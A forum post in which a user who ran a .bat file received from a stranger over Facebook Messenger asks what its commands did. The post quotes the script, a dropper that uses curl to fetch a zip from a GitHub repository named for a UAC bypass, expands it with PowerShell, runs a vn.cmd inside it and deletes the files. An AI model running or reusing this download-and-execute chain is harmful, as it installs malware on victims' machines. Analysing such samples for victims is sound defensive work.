Got an zipped archive from a stranger over FB messenger, containing a file named 'Poor quality item-a4UEBzN0Tg45RTzLA100-22100-10955.bat' in it. My bad that I double clicked the file from inside the zipped archive without thinking anything. And as it happened, it promptly ran some code in windows command window and disappeared in a flash. I just could see something 'github' and 'delete' etc words.
Can someone pls help tell me what these commands do? And by which portion of these commands can I learn what they did to my pc?
@echo off
cls
set url=https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4khanhhieu2.zip
set ZIP_PATH=C:\Users\Public
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"
call ""%DESTINATION_FOLDER%\vn.cmd"
del "%DESTINATION_FODLER%\vn.cmd"
exit